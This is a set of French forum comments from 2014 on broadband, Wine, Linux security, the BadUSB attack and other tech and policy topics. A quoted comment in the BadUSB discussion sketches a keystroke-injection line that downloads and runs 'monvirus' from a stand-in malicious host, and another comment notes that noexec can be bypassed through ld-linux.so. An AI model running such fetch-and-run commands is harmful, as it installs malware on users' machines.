Le 26/12/2014 à 20h 47

philanthropos a écrit :

Le RTC reste basique, mais il permet tout, sans soucis (pas de perte de sychro’, fonctionne peu importe la distance ou presque, simple à utiliser & installer, etc.). 


Le RTC permet tout, mais à 56k. La plupart du temps, ça ne suffit pas, même en secours. Surtout que si tu as un problème sur la ligne physique, ADSL et RTC tombent en même temps, donc ce n’est même pas viable pour du secours.
La seule vraie solution quand la connexion est critique, c’est la redondance : double ADSL sur deux opérateurs différents, ou plus fréquent, ADSL+3G.
ADSL+RTC, c’est de la redondance comme on le faisait il y a 15 ans (là où Orange est resté).
 
 

Le 25/12/2014 à 23h 37

Donc tu t’attends à ce que les journalistes vivent d’amour et d’eau fraîche.
Ou alors, tu ne veux pas du tout de presse en ligne, mais dans ce cas, je ne vois pas ce que tu viens faire sur NXi.
 

Le 24/12/2014 à 13h 38

NXi a fait le bon choix : des articles en accès libres, parce que sans ça, jamais je n’aurais été suffisamment fidèle pour franchir le pas et m’abonner. Et pas de pub pour les abonnés, sinon ça fait vraiment mesquin.

Le 19/12/2014 à 22h 26

Plus que jamais. Les débuts laborieux ont bien terni leur image de marque. Mais maintenant, ça marche bien.
 

Le 18/12/2014 à 22h 46

Ouh là. J’en connais beaucoup qui s’imaginent que Windows fait partie de l’ordinateur, et ne réalisent pas qu’on peut changer d’OS. IE fait partie de Windows (donc de l’ordinateur), tu es sûr qu’on peut installer un autre navigateur et que ça ne va rien casser ? (si, si, véridique)
 

Le 16/12/2014 à 14h 36

L’étude d’impactL’étude d’INpact.
" />

Le 16/12/2014 à 11h 38

Mais ils n’ont pas donné la durée de vie !
 

Le 15/12/2014 à 09h 59

127.0.0.1 a écrit :

On passe de l’extrême bling-bling de Vista à l’extrême sobriété de TWM.


Moi ça me rappelle plutôt fluxbox.
 

Le 13/12/2014 à 12h 40

Konrad a écrit :

Ensuite, si c’est un virus ciblant Windows, il va infecter ton environnement WINE, la belle affaire. Il sera incapable de toucher à quoi que ce soit dans le reste de ton /home, et encore moins dans le reste du système. Supprime l’environnement WINE, ou désinstalle WINE, et le virus devient complètement inopérant.


Wine est devenu tellement bon qu’il est capable d’exécuter bon nombre de malwares Windows (ceux qui s’exécutent avec les droits de l’utilisateur et se connectent à un serveur pour attendre les ordres par exemple, pas ceux qui cherchent à exploiter une faille du système).
Et Wine n’est pas une VM, un processus Wine a les même droits que n’importe quel processus utilisateur. En particulier, il peut accéder à tout le filesystem, et donc à ton /home - en général, z: est mappé sur / 

Le 12/12/2014 à 23h 24

Les logiciels de mail déballent les pièces jointes dans $TMPDIR (ou directement /tmp) qui est un peu plus sport à monter en noexec si on ne veut pas péter les gestionnaires de paquets. Mais même si tout ça est noexec, tu peux quand même recevoir un .exe reconnu comme un type de document qui s’ouvre avec l’application /usr/bin/wine.
Ou même n’importe quel binaire natif, tu l’exécutes même en noexec, en lançant explicitement /lib/ld-linux.so ./binaire mais ça ne serait pas fait automatiquement en cliquant sur un fichier par contre.
 

Le 11/12/2014 à 09h 15

Bref, comme freenet, mais pas anonyme.
 

Le 10/12/2014 à 23h 06

Jusqu’à présent, France 24 n’était pas diffusée en France… Moi je regarderait volontiers, sinon.
 

Le 09/12/2014 à 15h 15

Guyom_P a écrit :

C’est comme le clown de Greenpeace en parapente ou parachute je sais plus quoi qui est heureux d’avoir mis une banderole sur une tour de refroidissement. C’est bien ça fait du cinéma, ça essaie de faire croire qu’on peut venir mettre une bombe facilement dans une centrale et créé une catastrophe nucléaire. Sauf que ce n’est qu’une cheminée d’aérorefroidisseur pour évacuer la vapeur généré par le réchauffement de l’eau du circuit de refroidissement du circuit secondaire.


Fukushima a quand même bien montré que le refroidissement est critique. Pas besoin d’endommager le coeur du réacteur pour une catastrophe nucléaire, endommager le refroidissement et laisser le coeur surchauffer, ça suffit. 

Le 08/12/2014 à 14h 28

Si le groupe a 10000 membres, pourquoi ont-ils ciblé seulement ces 15 personnes ?
 

Le 08/12/2014 à 09h 25

Pour déposer un .fr, il faut être titulaire de la marque.
 

Le 05/12/2014 à 23h 06

C’est ceinture et bretelles : des containers à la dockers dans une VM partagée entre tous les containers.

Le 05/12/2014 à 13h 24

Orange aurait un meilleur débit ? Je me marre. Wanadoo a toujours été très conservateur, avec un SNR très haut, pour ne pas être emmerdé. Chez eux, c’est lent et stable. Mais lent quand même.
Alors que chez OVH, sur un DSLAM OVH, tu as accès directement aux profils de synchro. Perso, j’ai le profil VDSL2 Turbo (non-interleaved, donc) SNR 1dB. En standard, j’ai 32Mb/s (ce que j’aurais chez Orange) ; avec ce profil, j’ai 45Mb/s (et une désynchro tous les 15 jours, d’après les logs).
 

Le 05/12/2014 à 11h 07

C’est clair qu’il serait plus pertinent de comparer les tarifs avec OBS ou Nérim.
 

Le 05/12/2014 à 08h 48

Non, ils ne font la GTR que sur leur propre DSLAM, avec un supplément de 12EUR TTC. L’offre VDSL Entreprise à 72EUR TTC n’a pas de GTR !
 

Le 03/12/2014 à 23h 08

Android, iOS, et OS X. Hum. Il en manque un paquet pour être universel, et donc avoir du succès.
 

Le 03/12/2014 à 23h 04

Jonathan Livingston a écrit :

Si le dentiste-prothésiste abuse, ce sera relativement indolore pour le patient… dans l’immédiat. Mais ça plombera la Sécu, qui devra ensuite combler son déficit en réduisant ses prestations. 

 
Ah ah ! Tu as une idée du tarifs sécu des prothèses ? C’est comme le tarif sécu des lunettes : il est resté bloqué en 1970 sans revalorisation, et il prend en charge que quelques pourcents du tarif réel.
 

Le 03/12/2014 à 16h 28

Tarpan a écrit :

Imagine un seul instant que le médecin soit aussi le pharmacien (on me dit que souvent ça fonctionne en couple cette affaire là…) et qu’il prescrive un max de médocs inutiles sauf à remplir son portefeuille


C’est déjà le cas chez les vétos, et il n’y a pas spécialement d’abus (avec un véto sérieux).
 

Le 03/12/2014 à 16h 27

Pour les radios, c’est pourtant déjà le cas : ils prescrivent l’acte, le réalisent avec une machine hors de prix, et le facturent. Personne n’a rien trouvé à y redire.
 

Le 03/12/2014 à 14h 31

tazvld a écrit :

Comme dit précédemment : c’est un vote interne à un partie politique, il pourrait choisir la tête du partie à la courte paille ou durant un concours de boisson que ça ne les regarde que eux.
SI il valide ça, ils n’ont de compte à rendre qu’à leurs membres.


Grossière erreur. Un parti politique a obligation de respecter ses statuts, a fortiori quand l’essentiel de son financement est de l’argent public.
En plus, un faux en écriture, même à l’intérieur d’un parti ou d’une association à but non-lucratif, reste un délit.
 

Le 01/12/2014 à 23h 51

En l’occurrence, c’est régulé par les licences. Mais les conditions d’utilisation prévoient toujours explicitement que Facebook, Yahoo, Google, ou autres, puissent réutiliser vos photos dans certains cas (selon la licence, effectivement). Au pire, les gens l’ignorent ; au mieux, ils se disent que c’est purement théorique mais que ça n’arrivera pas en pratique. Il y a bien besoin d’une telle opération pour une petit prise de conscience que si, ça arrive.
 

Le 01/12/2014 à 16h 41

C’est bien. Les utilisateurs vont commencer à prendre conscience des implications concrètes des conditions générales d’utilisation des réseaux sociaux.

Le 27/11/2014 à 15h 32

Tiens, grâce à cet article je viens de découvrir qu’on pouvait changer la taille de la police…
 

Le 17/11/2014 à 22h 14

tazvld a écrit :

Tout comme blablacar se prend sa petite commission dessus.
Il faudrait donc taxer le covoiturage dans ce cas là ?
Si je ne me trompe pas, Ebay fait de même. Donc la vente de particulier à particulier, bien souvent d’occasion devrait être taxée ? Et pourquoi pas étendre ça aux vides greniers (je ne parle pas de brocanteur pro, je parle de Teddy, l’ado qui revend ses Action Man) ?


Ces revenus sont imposables, oui. Il y a exemption de TVA dans certains cas (dans certaines limites) pour les particuliers. Mais la taxe de séjour est applicable dans de nombreux cas (gîtes, B&B, etc. paient la taxe de séjour).

Le 17/11/2014 à 11h 59

tazvld a écrit :

Ma plus grosse crainte ici, c’est la brèche que ça ouvre dans la taxation de service entre particulier.


Sauf que, justement, Airbnb n’est pas un service entre particuliers. C’est une société commerciale qui prend sa marge au passage.

Le 17/11/2014 à 16h 39

Ou alors une annonce conjointe : un téléphone Nokia sous Sailfish OS.
 

Le 13/11/2014 à 15h 30

gokudomatic a écrit :

Mince! Avec ce titre accrocheur, j’avais même commencé à pensé que MS avait rendu visual studio compatible pour linux. Mais c’était trop demander.


C’est compatible android, donc d’une certaine façon, ils génèrent quand même du code Linux.
 

Le 13/11/2014 à 11h 51

À l’époque des RIB, le mandat de prélèvement papier était obligatoire (même si certains ne le demandaient pas, et étaient hors la loi). Mais désormais avec les virements SEPA, le mandat électronique est explicitement reconnu. Ils pourraient faire un effort chez Sosh.
 

Le 06/11/2014 à 14h 06

GPG n’a rien de lourdingue s’il est correctement intégré au client mail.

Le 22/10/2014 à 14h 21

mikkado06 a écrit :

a part les claviers/souris microsoft (qui sont deja a moitier pour les geeks, la majorité se contentant de leur souris dell/carrefour fournie) quels produits physiques microsoft ont percé? 

La XBox est quand même un tout petit peu célèbre.

Le 20/10/2014 à 15h 08

unCaillou a écrit :

Curiosité : Comment il compte les emails des salariés ? Si ils utilisent un webmail (la majorité aujourd’hui), le patron fait du MITM ?

Bah les logs du serveur smtp. Elle le faisait probablement depuis son adresse mail pro.
 

Le 16/10/2014 à 07h 51

Thanks for all of your feedback on this bug. We’ve heard you loud and clear.We plan to re-enable ext2/3/4 support in Files.app immediately. It will come back, just like it was before, and we’re working to get it into the next stable channel release.
Marche arrière toute ! bug 315401 

Le 13/10/2014 à 21h 56

127.0.0.1 a écrit :

(*) Faut bien avouer que c’est pas le format le plus utilisé pour formater un support de stockage externe. 

 Clairement. ext4, c’est bon pour le disque système. Les gros volume de données, c’est plutôt XFS.

Le 15/10/2014 à 14h 47

damaki a écrit :

 Ou alors plus rigolo, des trucs écrits dans des languages qui sont pas évidents à cross compiler en ARM (camel, par exemple). 

OCaml supporte officiellement l’ARM, pourtant.
 

Le 13/10/2014 à 16h 36

Bref, ils mesurent la vitesse du peering plutôt que la vitesse du lien.
 

Le 13/10/2014 à 09h 19

slow brain a écrit :

Bientôt un retour au système de saisie Palm ?


Ah, le système Graffiti du Palm Pilot ! Ceci ne nous rajeunit pas. C’est clair que c’est la même chose.
C’est encore supporté dans WebOS ?
 

Le 10/10/2014 à 07h 54

5francs a écrit :

@ Trollounet : avez-vous déjà participé à un dépouillage? j’ai eu l’occasion de le faire, s’il est fait dans les règles, c’est impossible de tricher.

Le seul risque que je vois c’est lors de la consolidation des résultats pour les remonter vers le ministère de l’intérieur, la je ne sais pas comment vérifier la véracité des votes.


Un “dépouillage” ? Un dépouillement, ça ira.

Pour vérifier la sincérité des résultats transmis, c’est simple : les préfectures publient les résultats reçus, bureau par bureau. C’est disponible sur le site web du ministère de l’intérieur. Tous ceux qui étaient présents au dépouillement peuvent vérifier que le résultat officiel de son bureau est bien le bon.
Et tout le monde peut télécharger tous les résultats et refaire les additions.

Le 08/10/2014 à 15h 08

ar7awn a écrit :

après aussi je ne trouve pas très fair-play de décompiler un logiciel propriétaire a plusieurs milliards de valeur. Surtout qu’il y a des protocoles libres équivalent, il faut respecter les licences.


 La différence entre un protocole équivalent et le protocole original, c’est l’interopérabilité.

Le 08/10/2014 à 14h 41

Yseader a écrit :

C’est fort quand même, accuser Microsoft “d’étouffer les concurrents” alors que la boite qui se plaint contrevient elle même à la loi " /> D’autant plus qu’il existe d’autres protocoles libres qu’ils auraient pu utiliser comme base au lieu de casser l’algorithme de Skype


Ils ne contreviennent pas à la loi.
Le reverse enginering pour l’interopérabilité est une exception à la protection des logiciels qui est explicitement prévue dans la loi DADVSI.
 

Le 08/10/2014 à 14h 11

yep a écrit :

Idem pour une carte réseau: quand je connecte mon câble USB, le DHCP est lancé automatiquement et j’ai internet. Pourquoi ça ne fonctionnerai pas avec une carte réseau USB?
 

Lancer automatiquement un DHCP sur une carte qu’on connaît, et sur laquelle on branche un câble Ethernet, c’est différent de brancher une nouvelle carte réseau.
Dans un cas, la carte réseau est connue du système et on a mémorisé qu’il fallait faire un DHCP dès qu’on détecte un câble Ethernet (toujours sur la même carte) ; dans l’autre cas, c’est un nouveau device sorti de nulle part, que l’on n’utilise pas par défaut.

Le 05/10/2014 à 22h 12

yep a écrit :

 Et une clé USB qui tout d’un coup passe en clavier et entre “ALT+F2” “termial” “wget   http://monvirus.com” ./monvirus &” “exit” ?


Encore faudrait-il qu’il y ait un terminal ouvert. Cette attaque ne fait rien de plus que ce que ferait quelqu’un qui a accès physique à ton clavier.
Je n’ai jamais de console ouverte qui ne soit pas verrouillée, qu’elle soit texte ou graphique. Ce n’est pas par peur des virus, juste de mes gamins (qui savent changer de VT).
Après, le machin peut toujours tenter d’ouvrir une xterm pendant que ça n’est pas verrouillé, quand je suis devant le PC. Faut déjà qu’il trouve la bonne combinaison de touche sous openbox. Et qu’il ne se fasse pas pécho lors de tentatives ratés sous mes yeux. Et que les messages du noyau lors du changement de type de device n’attirent pas mon attention. Et qu’il utilise la bonne keymap. Bon, ça fait beaucoup de si. Une attaque ciblé sur une personne précisément par la CIA, avec du renseignement en amont, éventuellement ça peut marcher. Un virus qui tape au petit bonheur la chance, bof.

Le 05/10/2014 à 21h 48

psn00ps a écrit :

Regarde les détails page 11 du pdf de Blackhat.
Le mot de passe est volé de façon transparente quand tu le saisis.
https://srlabs.de/badusb/
https://srlabs.de/blog/wp-content/uploads/2014/07/SRLabs-BadUSB-BlackHat-v1.pdf


Pour voler mon mot de passe, ils ont besoin d’avir déjà installé un LD_PRELOAD.
Il savent cracker un PC, mais à condition de l’avoir déjà cracké.

Bref, quand une boite de “sécurité informatique”, qui fait son business en vendant des solutions à des failles imaginaires, trouve une nouvelle faille, il y a lieu de se méfier. De la boîte, pas de la faille.

Le 05/10/2014 à 21h 46

earendil_fr a écrit :

Ben si (en tout cas avec NM ou WiCD)… Si tu branches une carte réseau USB et quelle se simule comme étant monté et “op”, le système va essayer de faire du DHCP dessus. Et si ton firmware renvoie les réponse au DHCP, c’est OK.

Regarde avec un adaptateur USB RJ45.


J’ai monté un routeur sous Linux avec 3 interfaces réseau, dont une en USB. Heureusement que ça ne fait pas des DHCP automatiquement sur tous les ports Ethernet, sinon, je ne vois même pas comment tu peut configurer un routeur sans finir à l’asile.
Ça ne le fait automatiquement que si tu as explicitement mis ‘auto’ et ‘dhcp’ dans ton /etc/network/interfaces pour chacune des interfaces.
NM, je n’en veux pas, ça n’attire que des problèmes. wicd, je le confine au wifi (câblé en dur sur wlan0, qui ne peut pas être spoofé par une clef USB puisque udev donne des noms statiques).

Le 05/10/2014 à 12h 41

yep a écrit :

Ce que les personnes de SRLabs ont fait, est une carte réseau factice qui (d’après ce que j’ai compris) possède un serveur DNS, mais pas de gateway. Du coup, le système demande à cette carte réseau à quelle adresse IP est paypal.com et elle retourne une adresse IP d’un site de fishing. On se connecte sur ce site, on entre notre login/password et voila… On s’est fait avoir.


Sauf que sur un système normal – sous Linux, du moins – une carte réseau qui sort de nulle part, elle n’est pas configurée automatiquement, et on n’y envoie pas les requêtes DNS sans l’avoir demandé explicitement. Pareil pour un device clavier ou souris, que veux-tu qu’il fasse ? Sans mot de passe root, il ne peut rien faire. Faire quelque chose sur mon login ? On le voit en direct et il se fait griller. Et quand je ne suis pas devant le PC, xlock, donc là encore il faut le mot de passe.
Si on a un OS un minimum sécurisé, je ne vois pas la faille.

Le 06/10/2014 à 11h 11

Ah, et il y a encore des cookies en pcinpact.com, qu’il faut autoriser manuellement pour que le login marche.
 

Le 06/10/2014 à 11h 03

Ça rame ! Alors qu’avant, sur v6.nextinpact.com, ça ne ramait pas…